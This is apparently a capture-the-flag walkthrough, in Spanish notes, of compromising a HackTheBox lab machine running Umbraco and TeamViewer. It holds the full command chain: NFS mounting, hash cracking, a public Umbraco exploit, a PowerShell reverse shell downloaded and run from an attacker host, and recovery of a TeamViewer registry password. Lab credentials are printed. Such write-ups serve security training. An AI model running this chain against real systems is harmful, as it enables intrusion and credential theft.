nmap -A -p- -oA remote 10.129.95.194 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA remote 10.129.95.194

nmap -sU -O -p- -oA remote-udp 10.129.95.194

nikto -h 10.129.95.180:80

Pasted image 20211221074723.png

Pasted image 20211221082818.png

ftp 10.129.95.194

Pasted image 20211221083658.png

whatweb http://10.129.95.194

Pasted image 20211221083757.png

nmap --script http-enum -p80 10.129.95.194 -oN scan -Pn

Pasted image 20211221085455.png

Vemos mountd y pensamos que es nfs

showmount -e 10.129.95.194

Pasted image 20211221085136.png

sudo mount -t nfs 10.129.95.194:/site_backups /mnt/nfs

Pasted image 20211221085644.png

cd /mnt/nfs && ll

Pasted image 20211221085742.png

https://10.129.95.194

Pasted image 20211221090213.png

searchsploit Umbrace

Pasted image 20211221090803.png

strings Umbraco.sdf | less -S

Pasted image 20211221093400.png

Vemos el hash de administrador y lo metemos a un archivo hash

Pasted image 20211221093753.png

john --wordlist=/usr/share/wordlists/rockyou.txt

Pasted image 20211221093728.png

http://10.129.95.194/umbraco

Pasted image 20211221095140.png

Vemos la version 7.12.4

Pasted image 20211221095410.png

searchsploit -m 46153

Pasted image 20211221095501.png

https://github.com/samratashok/nishang

mv Invoke-PowerShellTcp.ps1 Powershell.ps1

Pasted image 20211221103510.png

Modificamos el Powershell.ps1 con el puerto 443 y la ip de tu maquina kali

Pasted image 20211221103216.png

Modificamos las variables login,password y host

admin@htb.local:baconandcheese

Pasted image 20211221104431.png

python3 46153

nc -lvnp 443

python3 -m http.server 80

![[Pasted image 20211221105737.png]]

Modificamos el shell para poder tener un tamano adecuado.

Pasted image 20211221112501.png

Cambiamos el valor de cmd

"/c powershell IEX(new-object net.WebClient).downloadString(\'http://10.10.14.135/Invoke-ComptyShell.ps1\')";

Pasted image 20211221112902.png

Hacemos el stty raw echo; fg y despues enter de nuevo

Pasted image 20211221113121.png

whoami /priv

Pasted image 20211221113911.png

tasklist

Y vemos TeamViewer

Pasted image 20211221114157.png

locate teamviewer | grep metasploit

Pasted image 20211221114509.png

Vemos la version de TeamViewer que es la 7

Pasted image 20211221114844.png

Adquirimos la contrasena

(Get-itemproperty -Path .).SecurityPasswordAES

![[Pasted image 20211221121604.png]]

Vemos que la contrasena es !R3m0te!

Creamos un script

Pasted image 20211221125846.png

crackmapexec smb 10.129.95.194 -u 'Administrator' -p '!R3m0te!'

Pasted image 20211221130022.png

Pasted image 20211221130255.png

boxes

copyright©2022 Cu3rv0x all rights reserved